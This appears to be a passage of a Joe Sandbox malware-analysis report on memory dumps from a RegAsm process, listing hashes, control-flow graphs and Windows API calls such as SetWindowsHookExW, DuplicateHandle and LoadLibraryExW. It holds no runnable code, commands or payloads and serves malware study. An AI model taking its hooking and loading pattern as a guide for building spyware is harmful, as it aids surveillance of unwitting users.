                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7426becb3ce8788a16946dd1c341cda36ad48f014ada2dad757077b36b3611a0
                                                                                          • Instruction ID: 28bd27b51edff4158ca2c5550d546a495609ee21d927231b3df3389ccff31b6c
                                                                                          • Opcode Fuzzy Hash: 7426becb3ce8788a16946dd1c341cda36ad48f014ada2dad757077b36b3611a0
                                                                                          • Instruction Fuzzy Hash: 49F13E70A00209DFEB14DFA9C948BADBBF2FF88304F158559E405AB2A5DBB4D945CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 930 51b0040-51b004f 931 51b007b-51b007f 930->931 932 51b0051 930->932 933 51b0093-51b00d4 931->933 934 51b0081-51b008b 931->934 984 51b0057 call 51b0040 932->984 985 51b0057 call 51b0006 932->985 940 51b00e1-51b00ef 933->940 941 51b00d6-51b00de 933->941 934->933 935 51b005c-51b005e 938 51b0060 935->938 939 51b0074 935->939 982 51b0066 call 51b02d8 938->982 983 51b0066 call 51b02c8 938->983 939->931 942 51b0113-51b0115 940->942 943 51b00f1-51b00f6 940->943 941->940 946 51b0118-51b011f 942->946 947 51b00f8-51b00ff 943->947 948 51b0101 943->948 944 51b006c-51b006e 944->939 945 51b01b0-51b0270 944->945 975 51b0278-51b02a3 GetModuleHandleW 945->975 976 51b0272-51b0275 945->976 949 51b012c-51b0133 946->949 950 51b0121-51b0129 946->950 951 51b0103-51b0111 947->951 948->951 953 51b0140-51b0149 949->953 954 51b0135-51b013d 949->954 950->949 951->946 958 51b014b-51b0153 953->958 959 51b0156-51b015b 953->959 954->953 958->959 961 51b0179-51b017d 959->961 962 51b015d-51b0164 959->962 980 51b0180 call 51b05b8 961->980 981 51b0180 call 51b05a8 961->981 962->961 963 51b0166-51b0176 962->963 963->961 964 51b0183-51b0186 966 51b01a9-51b01af 964->966 967 51b0188-51b01a6 964->967 967->966 977 51b02ac-51b02c0 975->977 978 51b02a5-51b02ab 975->978 976->975 978->977 980->964 981->964 982->944 983->944 984->935 985->935
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 051B0296
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 1443bb2e153353142f87de97a2699fd51913d8a0a1e03dd53544aebcc4f157f5
                                                                                          • Instruction ID: 68ee2fd324872f08e78ec297a080d63c2fd691664364aabd19878c74094aecaa
                                                                                          • Opcode Fuzzy Hash: 1443bb2e153353142f87de97a2699fd51913d8a0a1e03dd53544aebcc4f157f5
                                                                                          • Instruction Fuzzy Hash: 4B7125B0A00B058FEB24DF2AD44479BBBF5FF88340F048929D48AD7A50DBB5E945CB91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 986 51b2226-51b2296 987 51b2298-51b229e 986->987 988 51b22a1-51b22a8 986->988 987->988 989 51b22aa-51b22b0 988->989 990 51b22b3-51b2352 CreateWindowExW 988->990 989->990 992 51b235b-51b2393 990->992 993 51b2354-51b235a 990->993 997 51b23a0 992->997 998 51b2395-51b2398 992->998 993->992 999 51b23a1 997->999 998->997 999->999
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051B2342
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: ba4f01a193d7f3fa2683d382ecd9559e6e030d5d0c484728bb77a1cf94f30b1c
                                                                                          • Instruction ID: c240bc208be97bf78f927ea852dd071b8edbdcd4a5a8a8c4d7304d0467747340
                                                                                          • Opcode Fuzzy Hash: ba4f01a193d7f3fa2683d382ecd9559e6e030d5d0c484728bb77a1cf94f30b1c
                                                                                          • Instruction Fuzzy Hash: B351D1B5D10349DFEB14CF99C984ADEBBB5FF88310F64822AE819AB210D7749945CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1000 51b2230-51b2296 1001 51b2298-51b229e 1000->1001 1002 51b22a1-51b22a8 1000->1002 1001->1002 1003 51b22aa-51b22b0 1002->1003 1004 51b22b3-51b2352 CreateWindowExW 1002->1004 1003->1004 1006 51b235b-51b2393 1004->1006 1007 51b2354-51b235a 1004->1007 1011 51b23a0 1006->1011 1012 51b2395-51b2398 1006->1012 1007->1006 1013 51b23a1 1011->1013 1012->1011 1013->1013
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 051B2342
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateWindow
                                                                                          • String ID:
                                                                                          • API String ID: 716092398-0
                                                                                          • Opcode ID: f3bc16cd470bf12be36a656a174dd66b34132376639a362104fbaf5b3ebaeaf9
                                                                                          • Instruction ID: cd0a5d92b78c6f8c30ef703213315f3c729c79511cc5d435aeb1020a2398f693
                                                                                          • Opcode Fuzzy Hash: f3bc16cd470bf12be36a656a174dd66b34132376639a362104fbaf5b3ebaeaf9
                                                                                          • Instruction Fuzzy Hash: 6F41E2B5D10349DFDB14CF99C984ADEBBB5FF88310F64822AE819AB210D7B19845CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1110 51b4990-51b49cc 1111 51b4a7c-51b4a9c 1110->1111 1112 51b49d2-51b49d7 1110->1112 1118 51b4a9f-51b4aac 1111->1118 1113 51b4a2a-51b4a62 CallWindowProcW 1112->1113 1114 51b49d9-51b4a10 1112->1114 1116 51b4a6b-51b4a7a 1113->1116 1117 51b4a64-51b4a6a 1113->1117 1121 51b4a19-51b4a28 1114->1121 1122 51b4a12-51b4a18 1114->1122 1116->1118 1117->1116 1121->1118 1122->1121
                                                                                          APIs
                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B4A51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallProcWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2714655100-0
                                                                                          • Opcode ID: 49d90a03cc8515fe6f54740860bacec493b645ca2f489f59c770eeeb341d4e8a
                                                                                          • Instruction ID: 89d06db2bccf0045b296c4646ee04111c5419a93813ac74282e26eb1db045ac6
                                                                                          • Opcode Fuzzy Hash: 49d90a03cc8515fe6f54740860bacec493b645ca2f489f59c770eeeb341d4e8a
                                                                                          • Instruction Fuzzy Hash: CB4119B9900305DFDB14CF99C848AAABBF6FF88314F25C459D519AB321D3B4A841CFA4
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1124 1067198-106719b 1125 10671a0-1067234 DuplicateHandle 1124->1125 1126 1067236-106723c 1125->1126 1127 106723d-106725a 1125->1127 1126->1127
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01067227
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 6e3da8d5f7626be462bd29673c693fb20283f2f2b0c2cdce5f845f09dbc04f4e
                                                                                          • Instruction ID: e7f21fb0a35cae17f05f4e5ac92c5ac3b5d129d849e753e810542bbb080c35cf
                                                                                          • Opcode Fuzzy Hash: 6e3da8d5f7626be462bd29673c693fb20283f2f2b0c2cdce5f845f09dbc04f4e
                                                                                          • Instruction Fuzzy Hash: E921E6B5900249EFDB10CF9AD984ADEBFF8EB48324F14841AE958B7310C378A954DF61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1130 10671a0-1067234 DuplicateHandle 1131 1067236-106723c 1130->1131 1132 106723d-106725a 1130->1132 1131->1132
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01067227
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 17cd6c43089c5946e5bcec1c61021d254afbc95f9fef4e47c5c61260d08f5a87
                                                                                          • Instruction ID: c9d2ca4cd869923651f6de919ae18b9576f6f6a083e33ef5be1b3cac6000e6b6
                                                                                          • Opcode Fuzzy Hash: 17cd6c43089c5946e5bcec1c61021d254afbc95f9fef4e47c5c61260d08f5a87
                                                                                          • Instruction Fuzzy Hash: BC21C4B5900249EFDB10CF9AD984ADEBFF8EB48324F14841AE954A3310D374A954DFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1135 1061c98-1061cea 1137 1061cf6-1061d28 SetWindowsHookExW 1135->1137 1138 1061cec 1135->1138 1139 1061d31-1061d56 1137->1139 1140 1061d2a-1061d30 1137->1140 1141 1061cf4 1138->1141 1140->1139 1141->1137
                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01061D1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 0867bf19caaf25ed4efcc25c9a49934df8cdeffd9c5b365e95b4bf11e8ca5a8a
                                                                                          • Instruction ID: 8fa0e317d58a3a319ba1cb672b697ccb08937602fb5d30720e70c73ed3599b3b
                                                                                          • Opcode Fuzzy Hash: 0867bf19caaf25ed4efcc25c9a49934df8cdeffd9c5b365e95b4bf11e8ca5a8a
                                                                                          • Instruction Fuzzy Hash: 2C2154B5D00209DFDB14DFA9C944BEEBBF4EF98320F20842AD855A3250C774A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 01061D1B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 14366c93fddd1ee4b2a76d6bab8e1b4f25963751eae1bc8ae98fdafe580c57ec
                                                                                          • Instruction ID: 2acd648ab823800e1613416a4434a71944e481cb892e669b4a07122fea9ed4e1
                                                                                          • Opcode Fuzzy Hash: 14366c93fddd1ee4b2a76d6bab8e1b4f25963751eae1bc8ae98fdafe580c57ec
                                                                                          • Instruction Fuzzy Hash: D62147B5D002499FDB14DF99C944BDEFBF5EF88320F10841AD414A7250CB74A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,051B72D2,00000000,00000000,03C060D8,02C26350), ref: 051B7B20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePeek
                                                                                          • String ID:
                                                                                          • API String ID: 2222842502-0
                                                                                          • Opcode ID: 59a1b31258c23b95eb8711aac747717e83a91031e29654164ed3464dc6b40e81
                                                                                          • Instruction ID: 78a266a56255fa557b39401fd3b66be7921761585cbf2dacf5fb297f2bd91c74
                                                                                          • Opcode Fuzzy Hash: 59a1b31258c23b95eb8711aac747717e83a91031e29654164ed3464dc6b40e81
                                                                                          • Instruction Fuzzy Hash: BA11E7B5804249DFDB10CF9AD984BDEBBF4FB48320F148429E955B3251C378A944DFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 051B0522
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: a91bdd2a60f26668903cbba164dee4d45cfc4556a554e498cda0c23b4def782a
                                                                                          • Instruction ID: 036bb90e37b91cf60a17d1db3d60b82f2210569ef70228c089644d45ea07338d
                                                                                          • Opcode Fuzzy Hash: a91bdd2a60f26668903cbba164dee4d45cfc4556a554e498cda0c23b4def782a
                                                                                          • Instruction Fuzzy Hash: 4911F3B6800349DFDB10CF9AD948ADEFBF4EB98320F14842AD919A7600C375A645CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 051B0522
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: cec9d4c36d6be2de8f3f56bddfe3c4f7f9213b891e1dd359e7514dd16b5aa803
                                                                                          • Instruction ID: 4ba3fde1a39e1f30698c1a13627042e2b45c75afa17ac39dea8a85eab1205f66
                                                                                          • Opcode Fuzzy Hash: cec9d4c36d6be2de8f3f56bddfe3c4f7f9213b891e1dd359e7514dd16b5aa803
                                                                                          • Instruction Fuzzy Hash: B51114B6800249CFDB10CF9AD544ADEFBF4EB48310F14841ED819A7600C375A644CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3507505702.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f5d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18d2c6d0a16750e5096197f1890fc6edfeec96aff4fd57cfde6bb5909f2f1431
                                                                                          • Instruction ID: c68ace3be4eb55f00eeba2559571addf0be4fe43de25ea027ba8f93c3cfc28bb
                                                                                          • Opcode Fuzzy Hash: 18d2c6d0a16750e5096197f1890fc6edfeec96aff4fd57cfde6bb5909f2f1431
                                                                                          • Instruction Fuzzy Hash: B8213471504600DFEB25DF14C9C0B26BBA5EB88325F24C96DDE094B246C33AD84ADB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3507505702.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f5d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77bffc6e411a20feaee89f913505530e46594822c0e5b13a20219a7c7063c833
                                                                                          • Instruction ID: 5573d933ba94a3150c1d9ea7cc65558c89bde034a6ad77e0dd3963b76e56ee8a
                                                                                          • Opcode Fuzzy Hash: 77bffc6e411a20feaee89f913505530e46594822c0e5b13a20219a7c7063c833
                                                                                          • Instruction Fuzzy Hash: 10210471A05200DFDB25DF24C9C0B26BF65EB94329F24C56DDE094B39AC33AD84BD662
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3507505702.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f5d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: abec997c6837031969a5c4104ef3063f83b6bbb789968b538625486f0905cf71
                                                                                          • Instruction ID: f4dabdf653c8c7ac12848c907aea7c63dd3bb5db12cbefa9d1fe08525eeab46d
                                                                                          • Opcode Fuzzy Hash: abec997c6837031969a5c4104ef3063f83b6bbb789968b538625486f0905cf71
                                                                                          • Instruction Fuzzy Hash: AC219F755093C08FDB12CF20C990715BF71EF46324F28C5EAC9498B6A7C33A984ACB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3507505702.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f5d000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f96a625460ad3af0aa34a9d910d12fab7faf9d49e24be8a80dad5209be419588
                                                                                          • Instruction ID: cf97fb743bd987af63cd14d123f1800c4016295a82f939c5e5478a8a55d02bbd
                                                                                          • Opcode Fuzzy Hash: f96a625460ad3af0aa34a9d910d12fab7faf9d49e24be8a80dad5209be419588
                                                                                          • Instruction Fuzzy Hash: FA11D075904680CFEB16CF10D9C4B15BB61FB44328F24C6ADDD094B656C33AD84ADB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3563039867.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_51b0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e59a454488c9a481afde1c7e2fe4319df9087094035f87ee9a8013de9a4f843
                                                                                          • Instruction ID: 7a9bc59eb5e4aa51a53a9f521db3e4959dd5e5beaa04466bdfb962e54050ad0d
                                                                                          • Opcode Fuzzy Hash: 4e59a454488c9a481afde1c7e2fe4319df9087094035f87ee9a8013de9a4f843
                                                                                          • Instruction Fuzzy Hash: DC5234B0900746CFE728CF18F88C6AA7BF1FB45318B558219D1665F2D8D3B8658ACF84
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3509486697.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_1060000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d8db239d7373d46bd56477491d51f8abf2ba0226debaaeb64a456ec9dec1014
                                                                                          • Instruction ID: cd160278ad9817b5cf64b829b30481895b6401b422f9071c11ad66758adcd01e
                                                                                          • Opcode Fuzzy Hash: 0d8db239d7373d46bd56477491d51f8abf2ba0226debaaeb64a456ec9dec1014
                                                                                          • Instruction Fuzzy Hash: 63A19F36E0021A9FCF15DFB4D8505DEBBF6FF85300B2581AAE905AB261DB71E915CB40
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%